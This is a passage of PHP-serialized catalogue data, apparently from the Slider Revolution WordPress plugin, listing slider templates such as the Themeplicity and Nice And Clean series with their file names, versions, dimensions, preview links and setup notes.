Header\";s:5:\"alias\";s:15:\"blendmodeheader\";s:3:\"zip\";s:19:\"blendmodeheader.zip\";s:3:\"uid\";s:32:\"2e44e976596d757aab40ffa28086dcf9\";s:3:\"img\";s:26:\"blendmodeheader/slide1.jpg\";s:7:\"preview\";s:57:\"https://revolution.themepunch.com/blend-mode-hero-header/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:4:\"1000\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">This full-screen hero header with HMTL5 background video, utilizes the new 5.3 blend mode effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:111;a:25:{s:2:\"id\";s:3:\"113\";s:5:\"title\";s:17:\"Themeplicity Menu\";s:5:\"alias\";s:17:\"themeplicity_menu\";s:3:\"zip\";s:27:\"packs/themeplicity_menu.zip\";s:3:\"uid\";s:32:\"7d5c1e75eaafa63683895a32a62f4ce0\";s:3:\"img\";s:28:\"themeplicity_menu/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:2:\"90\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:112;a:25:{s:2:\"id\";s:3:\"114\";s:5:\"title\";s:19:\"Themeplicity Header\";s:5:\"alias\";s:19:\"themeplicity_header\";s:3:\"zip\";s:29:\"packs/themeplicity_header.zip\";s:3:\"uid\";s:32:\"907091e4d58acc7d12f802de2f280b7d\";s:3:\"img\";s:30:\"themeplicity_header/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:4:\"1000\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:113;a:25:{s:2:\"id\";s:3:\"115\";s:5:\"title\";s:18:\"Themeplicity Offer\";s:5:\"alias\";s:18:\"themeplicity_offer\";s:3:\"zip\";s:28:\"packs/themeplicity_offer.zip\";s:3:\"uid\";s:32:\"1bd8f9aa2f3e340449664c65ba17fb51\";s:3:\"img\";s:29:\"themeplicity_offer/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"330\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:114;a:25:{s:2:\"id\";s:3:\"116\";s:5:\"title\";s:23:\"Themeplicity What We Do\";s:5:\"alias\";s:21:\"themeplicity_whatwedo\";s:3:\"zip\";s:31:\"packs/themeplicity_whatwedo.zip\";s:3:\"uid\";s:32:\"aa800a44b5a3eab30414dde1f32bfed7\";s:3:\"img\";s:32:\"themeplicity_whatwedo/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"813\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:115;a:25:{s:2:\"id\";s:3:\"117\";s:5:\"title\";s:21:\"Themeplicity Projects\";s:5:\"alias\";s:21:\"themeplicity_projects\";s:3:\"zip\";s:31:\"packs/themeplicity_projects.zip\";s:3:\"uid\";s:32:\"5f61b3a13033ba6a51a18270163e0a50\";s:3:\"img\";s:32:\"themeplicity_projects/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"813\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:116;a:25:{s:2:\"id\";s:3:\"118\";s:5:\"title\";s:24:\"Themeplicity Whats Great\";s:5:\"alias\";s:23:\"themeplicity_whatsgreat\";s:3:\"zip\";s:33:\"packs/themeplicity_whatsgreat.zip\";s:3:\"uid\";s:32:\"ce9faf8c55ed2e33e091b23667e7173b\";s:3:\"img\";s:34:\"themeplicity_whatsgreat/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:117;a:25:{s:2:\"id\";s:3:\"119\";s:5:\"title\";s:19:\"Themeplicity Tables\";s:5:\"alias\";s:19:\"themeplicity_tables\";s:3:\"zip\";s:29:\"packs/themeplicity_tables.zip\";s:3:\"uid\";s:32:\"f28bb4cd20ec1f29a1de7da5ad09c293\";s:3:\"img\";s:30:\"themeplicity_tables/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:4:\"1059\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:118;a:25:{s:2:\"id\";s:3:\"120\";s:5:\"title\";s:24:\"Themeplicity Contactform\";s:5:\"alias\";s:24:\"themeplicity_contactform\";s:3:\"zip\";s:34:\"packs/themeplicity_contactform.zip\";s:3:\"uid\";s:32:\"3e59da970f534490774fa8e053f5b5ed\";s:3:\"img\";s:35:\"themeplicity_contactform/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:4:\"1067\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:119;a:25:{s:2:\"id\";s:3:\"121\";s:5:\"title\";s:19:\"Themeplicity Footer\";s:5:\"alias\";s:19:\"themeplicity_footer\";s:3:\"zip\";s:29:\"packs/themeplicity_footer.zip\";s:3:\"uid\";s:32:\"89eeb0b4b852c5f743e1bd76e3e8f2ef\";s:3:\"img\";s:30:\"themeplicity_footer/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"780\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:120;a:25:{s:2:\"id\";s:3:\"122\";s:5:\"title\";s:20:\"Themeplicity Package\";s:5:\"alias\";s:20:\"themeplicity-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:20:\"themeplicity-package\";s:3:\"img\";s:38:\"packages/templatepack_themeplicity.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Themeplicity Website Template uses the new groups & rows feature introduced in 5.3 to its full potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:121;a:25:{s:2:\"id\";s:3:\"123\";s:5:\"title\";s:19:\"Nice And Clean Menu\";s:5:\"alias\";s:17:\"NiceAndClean_Menu\";s:3:\"zip\";s:27:\"packs/NiceAndClean_Menu.zip\";s:3:\"uid\";s:32:\"3f8c01e26c7446428e045c4b1180776d\";s:3:\"img\";s:28:\"NiceAndClean_Menu/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:2:\"90\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:122;a:25:{s:2:\"id\";s:3:\"124\";s:5:\"title\";s:21:\"Nice And Clean Header\";s:5:\"alias\";s:19:\"NiceAndClean_Header\";s:3:\"zip\";s:29:\"packs/NiceAndClean_Header.zip\";s:3:\"uid\";s:32:\"76931033addb20a62557c2845a4d6a11\";s:3:\"img\";s:30:\"NiceAndClean_Header/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:123;a:25:{s:2:\"id\";s:3:\"125\";s:5:\"title\";s:23:\"Nice And Clean Services\";s:5:\"alias\";s:21:\"NiceAndClean_Services\";s:3:\"zip\";s:31:\"packs/NiceAndClean_Services.zip\";s:3:\"uid\";s:32:\"02f72ec606800c8215bcadea09624e87\";s:3:\"img\";s:32:\"NiceAndClean_Services/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"360\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:124;a:25:{s:2:\"id\";s:3:\"126\";s:5:\"title\";s:20:\"Nice And Clean About\";s:5:\"alias\";s:18:\"NiceAndClean_About\";s:3:\"zip\";s:28:\"packs/NiceAndClean_About.zip\";s:3:\"uid\";s:32:\"9510f6fdbb8e9473e8c22f692a6bc89f\";s:3:\"img\";s:29:\"NiceAndClean_About/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:125;a:25:{s:2:\"id\";s:3:\"127\";s:5:\"title\";s:20:\"Nice And Clean Video\";s:5:\"alias\";s:18:\"niceandclean_video\";s:3:\"zip\";s:28:\"packs/niceandclean_video.zip\";s:3:\"uid\";s:32:\"2bb9e1ad329435cc500542d0c7025e15\";s:3:\"img\";s:29:\"niceandclean_video/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:126;a:25:{s:2:\"id\";s:3:\"128\";s:5:\"title\";s:25:\"Nice And Clean Highlights\";s:5:\"alias\";s:23:\"niceandclean_highlights\";s:3:\"zip\";s:33:\"packs/niceandclean_highlights.zip\";s:3:\"uid\";s:32:\"ff396af163a79d2d5b35db17c1ea7aa6\";s:3:\"img\";s:34:\"niceandclean_highlights/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:127;a:25:{s:2:\"id\";s:3:\"129\";s:5:\"title\";s:23:\"Nice And Clean Projects\";s:5:\"alias\";s:21:\"NiceAndClean_Projects\";s:3:\"zip\";s:31:\"packs/NiceAndClean_Projects.zip\";s:3:\"uid\";s:32:\"1e6695959ef83f8975b52289c08a4d44\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean 